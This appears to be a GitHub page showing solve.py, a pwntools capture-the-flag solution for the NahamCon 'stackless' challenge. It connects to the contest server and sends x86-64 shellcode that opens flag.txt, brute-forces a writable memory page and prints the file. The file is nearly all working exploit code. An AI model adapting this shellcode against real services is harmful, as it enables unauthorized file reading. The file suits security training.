-
Notifications
You must be signed in to change notification settings - Fork 24
/
solve.py
54 lines (39 loc) · 915 Bytes
/
solve.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
#!/usr/bin/env python3
from pwn import *
exe = ELF("./stackless_patched")
context.binary = exe
def conn():
r = process([exe.path])
return r
def main():
#r = conn()
r = remote("challenge.nahamcon.com", 30783)
# Bruteforce for binary rw-
# Start addr = 0x0000555555558000
shellcode = asm("""
lea rdi, [rip + 0x44]
mov rax, 2
syscall
mov r15, 0x0000555555556000
mov rdi, rax
mov rdx, 0x100
loop:
add r15, 0x4000
mov rsi, r15
mov rax, 0
syscall
cmp rax, 0xfffffffffffffff2
je loop
mov eax, 1
mov rdi, 1
syscall
""")
shellcode += b"flag.txt\x00"
r.recvline()
r.sendline(str(len(shellcode)))
r.recvline()
pause()
r.sendline(shellcode)
r.interactive()
if __name__ == "__main__":
main()